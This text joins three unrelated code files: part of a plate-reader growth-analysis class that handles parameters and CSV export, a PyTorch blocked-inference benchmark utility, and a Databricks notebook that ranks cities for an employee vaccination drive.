"""
Notify replicate(s) that a parameter changed and memoised results should be deleted.
For internal use only.
:param par: The name of the parameter that was changed.
:type par: str
The Replicate objects memoise some results that are expensive
to calculate. When a parameter is updated, the results may not
be valid anymore and should get removed from the "cache".
If par is given, this method can decide which results should
be removed.
"""
# only needed for non-background replicate groups (as background does not depend on parameters)
for tc in self.nonBackgroundWells():
tc._parametersUpdated(par,dontRecurse=True)
for tc in self.nonBackgroundReplicates():
tc._parametersUpdated(par,dontRecurse=True)
self.modified=True
def _replicateChanged(self,tc,par=None):
"""
Update replicates that depend on the given replicate.
For internal use only.
"""
if self.replicateGroups is None:
# for startup code: there are no replicate groups yet
return
idxOfTc=self._indexOfReplicateGroup(tc)
if idxOfTc is None:
raise RuntimeError("no matching tc for "+tc.fullId())
for ptc in self.wells:
if ptc._backgroundIndex == idxOfTc:
ptc._parametersUpdated(par='backgroundRawOd')
for ctc in self.replicateGroups:
if ctc._backgroundIndex == idxOfTc:
ctc._parametersUpdated(par='backgroundRawOd')
def _getDefaultParameter(self,par):
"""
Get default value of parameter.
For internal use only.
:param par: The name of the parameter.
:type par: str
The Plate stores values of plate-wide parameters
and default parameters.
"""
if par not in self._inheritableParameters:
raise RuntimeError('_getDefaultParameter: unknown parameter '+par)
return self._inheritableParameters[par]
def _getExplicitParameter(self,par):
"""
Get explicit value of parameter (alias for _getDefaultParameter).
For internal use only.
:param par: The name of the parameter.
:type par: str
"""
return self._getDefaultParameter(par)
def getParameter(self,par):
"""
Return the requested parameter.
:param par: The name of the parameter.
:type par: str
If the parameter is explicitly set for the plate, this value
        is returned. Otherwise return None.
See chapter :ref:`parameters <gat parameters>` for details of
parameter handling and available parameters.
"""
return self._getDefaultParameter(par)
def parameterIsEditible(self,par):
"""
        Return True if this parameter can have a plate-wide default.
:return: bool -- True if parameter can be edited.
Some parameters can only be changed per Replicate, some only
per Plate. This method is used to distinguish between them.
See chapter :ref:`parameters <gat parameters>` for details of
parameter handling and available parameters.
"""
if par in Plate._isNotPlateParameter and Plate._isNotPlateParameter[par]:
return False
if par not in self._inheritableParameters:
raise RuntimeError("parameterIsEditible: unknown parameter "+par)
return True
def parameterIsExplicitlySet(self,par):
"""
        Return True if this parameter is explicitly set.
:param par: The name of the parameter.
:type par: str
:return: bool -- True if parameter is explicitly set.
If a parameter is explicitly set for a replicate it overrides
an inherited value. This method is used to tell whether this
is the case. Since this object is a plate it tells whether a
default value has been set.
See chapter :ref:`parameters <gat parameters>` for details of
parameter handling and available parameters.
"""
return self._getExplicitParameter(par) is not None
def activeChildReplicatesHaveExplicitParameter(self,par):
"""
Return True if for at least one of the replicate groups the given parameter is explicitly set.
:param par: The name of the parameter.
:type par: str
:return: bool -- True if parameter is explicitly set in one of the replicate groups.
See chapter :ref:`parameters <gat parameters>` for details of
parameter handling and available parameters.
"""
for childtc in self.nonBackgroundReplicates():
if childtc._getExplicitParameter(par) is not None:
return True
if childtc.activeChildReplicatesHaveExplicitParameter(par):
return True
return False
def _setDefaultParameter(self,par,val):
"""
Change the (default) value of the given parameter.
For internal use only.
:param par: The name of the parameter that will be changed.
:type par: str
:param val: The new value.
"""
if par not in self._inheritableParameters:
raise RuntimeError('_setDefaultParameter: unknown parameter '+par)
self._inheritableParameters[par]=val
self._parametersUpdated(par)
def _setExplicitParameter(self,par,val):
"""
Change the value of the given parameter (alias for _setDefaultParameter).
For internal use only.
:param par: The name of the parameter that will be changed.
:type par: str
:param val: The new value.
"""
self._setDefaultParameter(par,val)
def setMaxGrowthLowerTimeCutoff(self,t):
"""Set lower limit of interval in which the maximal growth should be searched."""
self._setDefaultParameter('maxGrowthLowerTimeCutoff',t)
def setMaxGrowthUpperTimeCutoff(self,t):
"""Set upper limit of interval in which the maximal growth should be searched."""
self._setDefaultParameter('maxGrowthUpperTimeCutoff',t)
def setLogOdCutoff(self,lod):
"""Set cutoff value of log(OD)."""
self._setDefaultParameter('logOdCutoff',lod)
def setLagAtLogOdEquals(self,lagat):
"""Set value of log(OD) used to define the lag time."""
self._setDefaultParameter('lagAtLogOdEquals',lagat)
def setHighDensityCorrectionLinear(self,hdCorrectionLinear=None):
"""Set coefficient of linear term of high density correction."""
self._setDefaultParameter('hdCorrectionLinear',hdCorrectionLinear)
def setHighDensityCorrectionQuadratic(self,hdCorrectionQuadratic=None):
"""Set coefficient of quadratic term of high density correction."""
self._setDefaultParameter('hdCorrectionQuadratic',hdCorrectionQuadratic)
def setHighDensityCorrectionCubic(self,hdCorrectionCubic=None):
"""Set coefficient of cubic term of high density correction."""
self._setDefaultParameter('hdCorrectionCubic',hdCorrectionCubic)
def setSmoothingK(self,k):
"""Set degree of the smoothing spline."""
self._setDefaultParameter('smoothingK',k)
def setSmoothingS(self,s):
"""Set smoothing factor used to choose the number of knots."""
self._setDefaultParameter('smoothingS',s)
def setSlidingWindowSize(self,win):
"""
        Set the number of datapoints in the sliding window.
        The value is used for the local exponential fit (growth rate) and the linear regression (growth yield).
"""
self._setDefaultParameter('slidingWindowSize',win)
@staticmethod
def guessWellIds(numberOfWells):
"""
Return well ids by guessing the plate layout based on number of wells.
This function will return A1-P24 or A1-H12.
:param numberOfWells: number of wells of the plate
:type numberOfWells: int
:return: list(str) -- the guessed well ids (None if layout could not be guessed)
"""
# some "heuristics" about well ids: A1-P24 or A1-H12
if numberOfWells == 384:
labeldivisor=24
elif numberOfWells == 96:
labeldivisor=12
else:
return None
rowlabels=[chr(x) for x in range(ord('A'), ord('P') + 1)]
wellids=[]
for i in range(numberOfWells):
(lblchar,lblnum)=divmod(i, labeldivisor)
wellids.append(str(rowlabels[lblchar])+str(lblnum+1))
return wellids
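    # Example (editor's note): Plate.guessWellIds(96) yields ['A1', 'A2', ..., 'A12', 'B1', ..., 'H12'],
    # Plate.guessWellIds(384) yields 'A1' through 'P24', and any other well count returns None.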
@staticmethod
def availableColumnsForCsvExport(logOdDerivativeProperties=True):
"""
List the available properties that can be chosen for csv export.
:param logOdDerivativeProperties: include properties determined from log(OD) derivative
:type logOdDerivativeProperties: bool
:return: list(str), list(str) -- fixed columns (ids), properties
The 'fixed columns' list contains the sample/condition tuples
which should always be exported in order to identify the
replicates. For the other properties (except 'wellids') the
variance can be chosen by adding '_var' to the property name.
"""
fixedcolumns=['sample','condition']
columns=[]
columns.extend(['slope_linear',
'intercept_linear',
'timeOfMax_linear',
'lag_linear'])
columns.extend(['doublingtime_expfit',
'growthrate_expfit',
'od0_expfit',
'timeOfMax_expfit',
'lag_expfit'])
if logOdDerivativeProperties:
columns.extend(['doublingtime_local',
'growthrate_local',
'od0_local',
'timeOfMax_local',
'lag_local'])
columns.extend(['yield',
'timeOfYield'])
columns.extend(['wellids'])
return fixedcolumns, columns
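    # Illustrative csv-export sketch (editor's addition; 'growth.csv' is a hypothetical file name):
    #   fixed, props = Plate.availableColumnsForCsvExport()
    #   plate.growthParametersToCsv('growth.csv', columns=fixed + props)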
def growthParametersToCsv(self,filename,addVarianceColumns=True,singleWells=False, columns=None, progressCall=None,
**csvkwargs):
"""
Write a "comma seperated values" (csv) file of properties for all replicate groups.
:param filename: Filename.
:type filename: string
:param columns: List of properties that shall get exported (in that order).
:type columns: list(str)
:param addVarianceColumns: For each entry in columns add the corresponding variance
:type addVarianceColumns: bool
:param singleWells: Export properties of single well replicates instead of replicate groups
:type singleWells: bool
:param progressCall: Function that will be called on each iteration.
:type progressCall: @fun(int)
:param csvkwargs: Parameters which are passed on to the csv module; defaults to { 'dialect': 'excel' }
:type csvkwargs: dict()
"""
if 'dialect' not in csvkwargs:
csvkwargs['dialect']='excel'
col2collabel={
'lag_expfit': 'lag_expfit (ln(OD) == lagAtCutoff)',
'lag_expfit_var': 'lag_expfit_var (ln(OD) == lagAtCutoff)',
'lag_local': 'lag_local (ln(OD) == lagAtCutoff)',
'lag_local_var': 'lag_local_var (ln(OD) == lagAtCutoff)',
}
if columns is None:
columns, morecolumns=Plate.availableColumnsForCsvExport()
columns.extend(morecolumns)
if addVarianceColumns and not singleWells:
newcolums=[]
for col in columns:
newcolums.append(col)
if col in ['sample','condition','wellids']:
continue
if not col.endswith('_var') and col+'_var' not in columns:
newcolums.append(col+'_var')
columns=newcolums
if singleWells:
replicates=self.nonBackgroundWells()
else:
replicates=self.nonBackgroundReplicates()
with CsvFileUnicodeWriter(filename,**csvkwargs) as sliwriter:
descrow=[]
for col in columns:
if col in col2collabel:
descrow.append(col2collabel[col])
else:
descrow.append(col)
sliwriter.writerow(descrow)
allcnt=-1
for tc in replicates:
allcnt+=1
if progressCall is not None:
progressCall(allcnt)
if tc.od() is not None:
doublingtime_ef=None
doublingtimevar_ef=None
doublingtime_nls=None
doublingtimevar_nls=None
lag_linear=None
lagVar_linear=None
mu_ef, mu_ef_var, od0_ef, od0_ef_var, maxt_ef, maxt_ef_var, lag_ef, lag_ef_var, method_ef, status = tc.maxGrowthrate()
mu_nls, mu_nls_var, od0_nls, od0_nls_var, maxt_nls, maxt_nls_var, lag_nls, lag_nls_var, method_nls, status = tc.maxGrowthrateFromLogOdDerivative()
growthyield, growthyield_var, tgrowthyield, tgrowthyield_var, status=tc.growthyield()
slope_linear, slopeVar_linear, intercept_linear, interceptVar_linear, timeOfMax_linear, timeOfMaxVar_linear, timeOfMaxIndices_linear, plainSlopeStatus=tc.odSlopemaxIntercept()
doublingtime_ef, doublingtimevar_ef=Replicate.growthrateToDoublingTime(mu_ef,mu_ef_var)
doublingtime_nls, doublingtimevar_nls=Replicate.growthrateToDoublingTime(mu_nls,mu_nls_var)
if slope_linear is not None and slope_linear != 0:
lag_linear=-intercept_linear/(slope_linear)
if slopeVar_linear is not None and interceptVar_linear is not None:
lagVar_linear=((intercept_linear/(slope_linear**2))**2 * slopeVar_linear +
1/slope_linear**2 * interceptVar_linear)
else:
(doublingtime_ef, doublingtimevar_ef, doublingtime_nls, doublingtimevar_nls)=(None,None,None,None)
(mu_ef, mu_ef_var, od0_ef, od0_ef_var, maxt_ef, maxt_ef_var, lag_ef, lag_ef_var)=([None,None,None,None,None,None,None,None])
(mu_nls, mu_nls_var, od0_nls, od0_nls_var, maxt_nls, maxt_nls_var, lag_nls, lag_nls_var)=([None,None,None,None,None,None,None,None])
(growthyield,growthyield_var,tgrowthyield,tgrowthyield_var)=([None,None,None,None])
(slope_linear, slopeVar_linear, intercept_linear, interceptVar_linear,
timeOfMax_linear, timeOfMaxVar_linear, lag_linear, lagVar_linear)=([None,None,None,None,None,None,None,None])
thisrow=[]
for col in columns:
if col == 'sample':
thisrow.append(tc.sampleid)
elif col == 'condition':
thisrow.append(tc.condition)
elif col == 'slope_linear':
thisrow.append(slope_linear)
elif col == 'slope_linear_var':
thisrow.append(slopeVar_linear)
elif col == 'intercept_linear':
thisrow.append(intercept_linear)
elif col == 'intercept_linear_var':
thisrow.append(interceptVar_linear)
elif col == 'timeOfMax_linear':
thisrow.append(timeOfMax_linear)
elif col == 'timeOfMax_linear_var':
thisrow.append(timeOfMaxVar_linear)
elif col == 'lag_linear':
thisrow.append(lag_linear)
elif col == 'lag_linear_var':
thisrow.append(lagVar_linear)
elif col == 'doublingtime_expfit':
thisrow.append(doublingtime_ef)
elif col == 'doublingtime_expfit_var':
thisrow.append(doublingtimevar_ef)
elif col == 'growthrate_expfit':
thisrow.append(mu_ef)
elif col == 'growthrate_expfit_var':
thisrow.append(mu_ef_var)
elif col == 'od0_expfit':
thisrow.append(od0_ef)
elif col == 'od0_expfit_var':
thisrow.append(od0_ef_var)
elif col == 'timeOfMax_expfit':
thisrow.append(maxt_ef)
elif col == 'timeOfMax_expfit_var':
thisrow.append(maxt_ef_var)
elif col == 'lag_expfit':
thisrow.append(lag_ef)
elif col == 'lag_expfit_var':
thisrow.append(lag_ef_var)
elif col == 'doublingtime_local':
thisrow.append(doublingtime_nls)
elif col == 'doublingtime_local_var':
thisrow.append(doublingtimevar_nls)
elif col == 'growthrate_local':
thisrow.append(mu_nls)
elif col == 'growthrate_local_var':
thisrow.append(mu_nls_var)
elif col == 'od0_local':
thisrow.append(od0_nls)
elif col == 'od0_local_var':
thisrow.append(od0_nls_var)
elif col == 'timeOfMax_local':
thisrow.append(maxt_nls)
elif col == 'timeOfMax_local_var':
thisrow.append(maxt_nls_var)
elif col == 'lag_local':
thisrow.append(lag_nls)
elif col == 'lag_local_var':
thisrow.append(lag_nls_var)
elif col == 'yield':
thisrow.append(growthyield)
elif col == 'yield_var':
thisrow.append(growthyield_var)
elif col == 'timeOfYield':
thisrow.append(tgrowthyield)
elif col == 'timeOfYield_var':
thisrow.append(tgrowthyield_var)
elif col == 'wellids':
thisrow.append(tc.activeChildWellIdStr())
else:
raise RuntimeError('unknown property '+col)
sliwriter.writerow(thisrow)
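    # Usage sketch (hypothetical file name, not from the original source):
    #   plate.growthParametersToCsv('growth.csv',
    #                               columns=['sample', 'condition', 'growthrate_expfit', 'yield'])
    # writes one row per replicate group containing the chosen properties;
    # passing singleWells=True exports one row per individual well instead.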
def timeseriesToCsv(self,filename,
addVarianceColumns=True,
singleWells=False,
columns=None,
fullId=False,
progressCall=None,
**csvkwargs):
"""
Write a "comma seperated values" (csv) file of time series for all replicate groups.
:param filename: Filename.
:type filename: string
:param columns: List of time series that shall get exported for each replicate.
:type columns: list(str)
:param addVarianceColumns: For each entry in columns add the corresponding variance
:type addVarianceColumns: bool
:param singleWells: Export time series of single well replicates instead of replicate groups
:type singleWells: bool
:param fullId: Label the columns with the full id (including well ids) instead of "sample condition"
:type fullId: bool
:param progressCall: Function that will be called on each iteration.
:type progressCall: @fun(int)
:param csvkwargs: Parameters which are passed on to the csv module; defaults to { 'dialect': 'excel' }
:type csvkwargs: dict()
"""
if 'dialect' not in csvkwargs:
csvkwargs['dialect']='excel'
col2collabel={
'od': 'OD',
'od_var': 'var(OD)',
'lnod': 'ln(OD)',
}
if columns is None:
columns=['od']
if addVarianceColumns and not singleWells:
newcolums=[]
for col in columns:
newcolums.append(col)
if col in ['lnod']:
continue
if not col.endswith('_var') and col+'_var' not in columns:
newcolums.append(col+'_var')
columns=newcolums
if singleWells:
replicates=self.nonBackgroundWells()
else:
replicates=self.nonBackgroundReplicates()
with CsvFileUnicodeWriter(filename,**csvkwargs) as sliwriter:
# header
descrow=['t']
for tc in replicates:
for col in columns:
if col in col2collabel:
lbl=col2collabel[col]
else:
lbl=col
if fullId:
lbl+=' '+tc.fullId()
else:
lbl+=' '+tc.sampleid+' '+tc.condition
if singleWells:
lbl+=' '+tc.activeChildWellIdStr()
descrow.append(lbl)
sliwriter.writerow(descrow)
# data
allcnt=-1
for ti in range(len(self.time)):
allcnt+=1
if progressCall is not None:
progressCall(allcnt)
thisrow=[]
thisrow.append(self.time[ti])
for tc in replicates:
for col in columns:
if col == 'od':
if tc.od() is not None:
thisrow.append(tc.od()[ti])
else:
thisrow.append(None)
elif col == 'od_var':
if tc.odVar() is not None:
thisrow.append(tc.odVar()[ti])
else:
thisrow.append(None)
elif col == 'lnod':
if tc.logOd() is not None:
thisrow.append(tc.logOd()[ti])
else:
thisrow.append(None)
else:
raise RuntimeError('unknown property '+col)
sliwriter.writerow(thisrow)
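    # Usage sketch (hypothetical file name, not from the original source):
    #   plate.timeseriesToCsv('timeseries.csv', columns=['od'], addVarianceColumns=True)
    # exports a 't' column followed by an 'OD ...' and 'var(OD) ...' column pair
    # for each replicate group.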
@staticmethod
def _numWellsToFormatString(numWells):
"""
Return a string uniquely identifying a plate format.
NOTE this function is subject to change.
"""
if numWells == 100:
return '100honeycomb'
elif numWells == 200:
return '200honeycomb'
return str(numWells)
@staticmethod
def writeMetadata(filename,metadata,metadataKeys,plateformat='96',**csvkwargs):
"""
:param metadata: the metadata
:type metadata: list(dict)
"""
columnMajorOrder=False
if plateformat == '96':
if len(metadata) != 96:
raise RuntimeError('metadata is not of length 96')
numcols=12
numrows=8
elif plateformat == '384':
if len(metadata) != 384:
raise RuntimeError('metadata is not of length 384')
numcols=24
numrows=16
elif plateformat == '200honeycomb':
if len(metadata) != 200:
raise RuntimeError('metadata is not of length 200')
columnMajorOrder=True
numcols=20 # number of columns in the layout of the exported metadata
numrows=10 # number of rows
if plateformat == '96' or plateformat == '384':
rowlabels=[chr(x) for x in range(ord('A'), ord('A') + numrows)]
collabels=[str(i+1) for i in range(numcols)]
elif plateformat == '200honeycomb':
rowlabels=[str(i) for i in range(1,numrows+1)]
collabels=[str(i+1) for i in range(0,len(metadata),numrows)]
else:
raise RuntimeError('not implemented for format other than 96, 384 or 200 honeycomb')
if columnMajorOrder:
reordered=[]
# transpose
for rowidx in range(numrows):
for colidx in range(numcols):
metentryidx=rowidx + colidx * numrows
reordered.append(metadata[metentryidx])
else:
reordered=metadata # keep order
if 'dialect' not in csvkwargs:
csvkwargs['dialect']='excel'
with CsvFileUnicodeWriter(filename,**csvkwargs) as writer:
# header: just the name of the metadata
for key in metadataKeys:
row=[key]
writer.writerow(row)
# the column ids
row=['<>']
row.extend(collabels)
writer.writerow(row)
# now the data, divided into rows of numcols columns
colit=reordered.__iter__()
for rowlab in rowlabels:
row=[rowlab]
for j in range(numcols):
thismeta=next(colit)
val=thismeta[key] if key in thismeta else None
row.append(val)
writer.writerow(row)
# an empty row
row=[]
writer.writerow(row)
@staticmethod
def readMetadata(filename,plateformat='96',**csvkwargs):
"""
Read metadata from a csv file.
        For each metadata key a table is read. The table should be laid
        out according to the plate layout. To get a template, call
writeMetadata(outfile,[{} for i in range(numOfColumns)],Plate.metadataKeys)
"""
columnMajorOrder=False
if plateformat == '96':
numcols=12
numrows=8
elif plateformat == '384':
numcols=24
numrows=16
elif plateformat == '200honeycomb':
columnMajorOrder=True
numcols=20 # number of columns in the layout of the exported metadata
numrows=10 # number of rows
if plateformat == '96' or plateformat == '384':
rowlabels=[chr(x) for x in range(ord('A'), ord('A') + numrows)]
collabels=[str(i+1) for i in range(numcols)]
elif plateformat == '200honeycomb':
rowlabels=[str(i) for i in range(1,numrows+1)]
collabels=[str(i+1) for i in range(0,numcols*numrows,numrows)]
else:
raise RuntimeError('not implemented for format other than 96, 384 or 200 honeycomb')
# initialise the metadata list
metadata=[{} for i in range(numcols*numrows)]
if 'dialect' not in csvkwargs:
csvkwargs['dialect']='excel'
with CsvFileUnicodeReader(filename,**csvkwargs) as odreader:
nextlinemode='nada'
metkey=None
lineno=0
for row in odreader:
lineno+=1
if nextlinemode == 'nada':
if len(row) == 0 or row[0] == '':
# skip empty row
continue
else:
metkey=row[0]
nextlinemode='starttable'
elif nextlinemode == 'starttable':
if len(row) == 0:
raise Plate.BadMetadata('Row at start of table is empty',lineno,filename=filename)
if row[0] != '<>' or row[1] != '1' or len(row) != numcols+1:
raise Plate.BadMetadata('This does not look like the beginning of a table'+
', expected row[0] == "<>", row[1] == "1" and len(row) == '+str(numcols+1)+
', but got row[0]=="'+str(row[0])+'", row[1] == "'+str(row[1])+
'" and len(row) == '+str(len(row)),
lineno,filename=filename)
nextlinemode='intable'
rowcnt=0
metit=metadata.__iter__()
elif nextlinemode == 'intable':
rowcnt+=1
if len(row) == 0:
raise Plate.BadMetadata('Row '+str(rowcnt)+' is empty',lineno,filename=filename)
if row[0].upper() != rowlabels[rowcnt-1]:
raise Plate.BadMetadata('Row '+str(rowcnt)+' does not start with '+rowlabels[rowcnt-1]+
' (found "'+row[0].upper()+'")',lineno,filename=filename)
row.pop(0)
numOfValsThisRow=len(row)
if numOfValsThisRow > numcols:
numOfValsThisRow=numcols
# read the columns of this row
colit=row.__iter__()
for i in range(numOfValsThisRow):
val=next(colit)
if val == '':
                            # map empty string to None
val=None
metentry=next(metit)
metentry[metkey]=val
# if the last columns are empty, fill them up with None
for i in range(numcols-numOfValsThisRow):
metentry=next(metit)
metentry[metkey]=None
if rowcnt == numrows:
nextlinemode='nada'
if columnMajorOrder:
reordered=[]
for colidx in range(numcols):
for rowidx in range(numrows):
metentryidx=rowidx * numcols + colidx
reordered.append(metadata[metentryidx])
metadata=reordered
return metadata
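    # Usage sketch (hypothetical file name and metadata keys, not from the original source):
    #   Plate.writeMetadata('meta.csv', [{} for i in range(96)], ['sample', 'condition'])
    #   metadata = Plate.readMetadata('meta.csv', plateformat='96')
    # readMetadata returns one dict per well, keyed by the metadata keys found in the file.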
class Error(Exception):
"""Base class for exceptions in this module."""
pass
class MultipleBackgroundIdsError(Error):
"""Exception raised if there are different IDs for background wells."""
def __init__(self, backgroundSampleIds):
self._backgroundSampleIds = backgroundSampleIds
def __str__(self):
return str('multiple keys were found that could be background (blank) samples, make sure there is only one.' +
'\nThe keys are:\n'+str(self._backgroundSampleIds))
class UnknownFileFormat(Error):
"""Exception raised when an unsupported serialisation format is opened."""
def __init__(self,filename,serFormat=None,serFormatVersion=None,detailedError=None):
self.filename = filename
self.serFormat = serFormat
self.serFormatVersion = serFormatVersion
self.detailedError = detailedError
def __str__(self):
if self.serFormat is not None:
if self.serFormat.startswith('clsplates'):
message= 'You tried to open a Chronological Life Span (CLS) file ("'+self.filename+'"), please use the CLS analyser for this'
else:
message = 'Unsupported file format "'+self.serFormat+'"'
if self.serFormatVersion is not None:
message += ' version "'+self.serFormatVersion+'"'
message += ' in file "'+self.filename+'"'
else:
message = 'Unsupported file format in file "'+self.filename+'"'
if self.detailedError is not None:
message+=': '+self.detailedError+'.'
else:
message+='.'
return message
class BadMetadata(Error):
"""Exception raised when an unsupported serialisation format is opened."""
def __init__(self,detailedError=None,lineno=None,filename=None):
self.detailedError = detailedError
self.filename = filename
self.lineno = lineno
def __str__(self):
message = self.detailedError
if self.lineno is not None:
message += ' around line '+str(self.lineno)
if self.filename is not None:
message += ' in file '+str(self.filename)
return message
|
platereader/gathode
|
platereader/plate.py
|
plate.py
|
py
| 71,939 |
python
|
en
|
code
| 4 |
github-code
|
6
|
648697707
|
import numbers
import time
from itertools import product
import numpy as np
import torch
try:
from tqdm import tqdm
except ImportError:
def tqdm(x):
return x
def product1d(inrange):
for ii in inrange:
yield ii
def slice_to_start_stop(s, size):
"""For a single dimension with a given size, normalize slice to size.
Returns slice(None, 0) if slice is invalid."""
if s.step not in (None, 1):
raise ValueError('Nontrivial steps are not supported')
if s.start is None:
start = 0
elif -size <= s.start < 0:
start = size + s.start
elif s.start < -size or s.start >= size:
return slice(None, 0)
else:
start = s.start
if s.stop is None or s.stop > size:
stop = size
elif s.stop < 0:
stop = (size + s.stop)
else:
stop = s.stop
if stop < 1:
return slice(None, 0)
return slice(start, stop)
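# Illustrative examples (not part of the original module):
#   slice_to_start_stop(slice(None, None), 10) -> slice(0, 10)
#   slice_to_start_stop(slice(-3, None), 10)   -> slice(7, 10)
#   slice_to_start_stop(slice(12, 20), 10)     -> slice(None, 0)   (start out of range)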
def int_to_start_stop(i, size):
"""For a single dimension with a given size, turn an int into slice(start, stop)
pair."""
if -size < i < 0:
start = i + size
elif i >= size or i < -size:
raise ValueError('Index ({}) out of range (0-{})'.format(i, size - 1))
else:
start = i
return slice(start, start + 1)
def normalize_slices(slices, shape):
""" Normalize slices to shape.
Normalize input, which can be a slice or a tuple of slices / ellipsis to
be of same length as shape and be in bounds of shape.
Args:
slices (int or slice or ellipsis or tuple[int or slice or ellipsis]): slices to be normalized
Returns:
tuple[slice]: normalized slices (start and stop are both non-None)
tuple[int]: which singleton dimensions should be squeezed out
"""
type_msg = 'Advanced selection inappropriate. ' \
'Only numbers, slices (`:`), and ellipsis (`...`) are valid indices (or tuples thereof)'
if isinstance(slices, tuple):
slices_lst = list(slices)
elif isinstance(slices, (numbers.Number, slice, type(Ellipsis))):
slices_lst = [slices]
else:
raise TypeError(type_msg)
ndim = len(shape)
if len([item for item in slices_lst if item != Ellipsis]) > ndim:
raise TypeError("Argument sequence too long")
elif len(slices_lst) < ndim and Ellipsis not in slices_lst:
slices_lst.append(Ellipsis)
normalized = []
found_ellipsis = False
squeeze = []
for item in slices_lst:
d = len(normalized)
if isinstance(item, slice):
normalized.append(slice_to_start_stop(item, shape[d]))
elif isinstance(item, numbers.Number):
squeeze.append(d)
normalized.append(int_to_start_stop(int(item), shape[d]))
elif isinstance(item, type(Ellipsis)):
if found_ellipsis:
raise ValueError("Only one ellipsis may be used")
found_ellipsis = True
while len(normalized) + (len(slices_lst) - d - 1) < ndim:
normalized.append(slice(0, shape[len(normalized)]))
else:
raise TypeError(type_msg)
return tuple(normalized), tuple(squeeze)
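# Illustrative example (not part of the original module): for a 3d shape,
#   normalize_slices(np.s_[1, :5, ...], (10, 20, 30))
# returns ((slice(1, 2), slice(0, 5), slice(0, 30)), (0,)), i.e. the integer index
# becomes a singleton slice and dimension 0 is marked for squeezing.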
def blocking(shape, block_shape, roi=None, center_blocks_at_roi=False):
""" Generator for nd blocking.
Args:
shape (tuple): nd shape
block_shape (tuple): nd block shape
roi (tuple[slice]): region of interest (default: None)
center_blocks_at_roi (bool): if given a roi,
whether to center the blocks being generated
at the roi's origin (default: False)
"""
assert len(shape) == len(block_shape), "Invalid number of dimensions."
if roi is None:
# compute the ranges for the full shape
ranges = [range(sha // bsha if sha % bsha == 0 else sha // bsha + 1)
for sha, bsha in zip(shape, block_shape)]
min_coords = [0] * len(shape)
max_coords = shape
else:
# make sure that the roi is valid
roi, _ = normalize_slices(roi, shape)
ranges = [range(rr.start // bsha,
rr.stop // bsha if rr.stop % bsha == 0 else rr.stop // bsha + 1)
for rr, bsha in zip(roi, block_shape)]
min_coords = [rr.start for rr in roi]
max_coords = [rr.stop for rr in roi]
need_shift = False
if roi is not None and center_blocks_at_roi:
shift = [rr.start % bsha for rr, bsha in zip(roi, block_shape)]
need_shift = sum(shift) > 0
# product raises memory error for too large ranges,
# because input iterators are cast to tuple
# so far I have only seen this for 1d "open-ended" datasets
# and hence just implemented a workaround for this case,
# but it should be fairly easy to implement an nd version of product
# without casting to tuple for our use case using the imglib loop trick, see also
# https://stackoverflow.com/questions/8695422/why-do-i-get-a-memoryerror-with-itertools-product
try:
start_points = product(*ranges)
except MemoryError:
assert len(ranges) == 1
start_points = product1d(ranges)
for start_point in start_points:
positions = [sp * bshape for sp, bshape in zip(start_point, block_shape)]
if need_shift:
positions = [pos + sh for pos, sh in zip(positions, shift)]
if any(pos > maxc for pos, maxc in zip(positions, max_coords)):
continue
yield tuple(slice(max(pos, minc), min(pos + bsha, maxc))
for pos, bsha, minc, maxc in zip(positions, block_shape,
min_coords, max_coords))
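# Illustrative example (not part of the original module): blocking a (4, 5) array
# into 2x2 tiles yields block slices that are clipped at the boundary:
#   blocks = list(blocking((4, 5), (2, 2)))
#   blocks[0]  -> (slice(0, 2), slice(0, 2))
#   blocks[-1] -> (slice(2, 4), slice(4, 5))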
def ensure_5d(tensor):
if tensor.ndim == 3:
tensor = tensor[None, None]
elif tensor.ndim == 4:
tensor = tensor[None]
elif tensor.ndim == 5:
pass
return tensor
# we don't save any output, because this is just for benchmarking purposes
def run_inference(input_dataset, model,
block_shape, halo,
preprocess,
precision):
dtype = torch.float32 if precision == 'single' else torch.float16
device = torch.device('cuda')
model.to(device, dtype=dtype)
model.eval()
shape = input_dataset.shape
full_block_shape = tuple(bs + 2 * ha for bs, ha in zip(block_shape, halo))
local_bb = tuple(slice(ha, bsh - ha)
for bsh, ha in zip(block_shape, halo))
def grow_bounding_box(bb):
grown_bb = tuple(slice(max(b.start - ha, 0), min(sh, b.stop + ha))
for b, ha, sh in zip(bb, halo, shape))
return grown_bb
def ensure_block_shape(input_):
if input_.shape != full_block_shape:
pad_shape = [(0, bsh - sh)
for bsh, sh in zip(full_block_shape, input_.shape)]
input_ = np.pad(input_, pad_shape)
return input_
blocks = list(blocking(shape, block_shape))
per_block_times = []
t_tot = time.time()
with torch.no_grad():
for bb in tqdm(blocks):
bb = grow_bounding_box(bb)
input_ = input_dataset[bb]
input_ = ensure_block_shape(input_)
input_ = preprocess(input_)
input_ = ensure_5d(input_)
t0 = time.time()
input_ = torch.from_numpy(input_).to(device, dtype=dtype)
output = model(input_)
output = output.cpu().to(dtype=torch.float32).numpy()
per_block_times.append(time.time() - t0)
# this is where we would save the output ...
output = output[0]
output = output[(slice(None),) + local_bb]
t_tot = time.time() - t_tot
return t_tot, per_block_times
|
constantinpape/3d-unet-benchmarks
|
bench_util/inference.py
|
inference.py
|
py
| 7,760 |
python
|
en
|
code
| 3 |
github-code
|
6
|
29007933984
|
# Databricks notebook source
from pyspark.sql.functions import expr, col
import pyspark.sql.functions as fn
sampleEmployee = spark.read.format("csv").option("header","true").load("dbfs:/FileStore/shared_uploads/[email protected]/us_500.csv")
# COMMAND ----------
employeeDF = sampleEmployee.withColumn('web', expr('explode(array_repeat(web,100))'))
# COMMAND ----------
employeeDF_grouped = employeeDF.groupby(['city'])
CityEmployeeDensity = employeeDF_grouped.agg(fn.count(col('email')).alias('countOfEmployees'))
# COMMAND ----------
employeeDF.createOrReplaceTempView("employeeDataFrame")
CityEmployeeDensity.createOrReplaceTempView("CityEmpDensity")
sequenceOfCityDF = sqlContext.sql(" select city, countOfEmployees, rank() over(order by countOfEmployees desc, city) as Sequence from CityEmpDensity ")
sequenceOfCityDF.createOrReplaceTempView("sequenceOfCityDataFrame")
VaccinationDrivePlan = sqlContext.sql(" SELECT EDF.*, SDF.Sequence FROM employeeDataFrame EDF INNER JOIN sequenceOfCityDataFrame SDF ON EDF.city = SDF.city ")
VaccinationDrivePlan.show()
# COMMAND ----------
VaccinationDrivePlan.createOrReplaceTempView("VaccinationlPlan")
noOfDaysVaccineDrive = sqlContext.sql("SELECT city, countOfEmployees, CEILING(countOfEmployees/100) as noOfDaysToCompleteVaccination FROM CityEmpDensity")
filnalVaccineDrive = noOfDaysVaccineDrive.withColumn('noOfDaysToCompleteVaccination', expr('explode(array_repeat(noOfDaysToCompleteVaccination,int(noOfDaysToCompleteVaccination)))'))
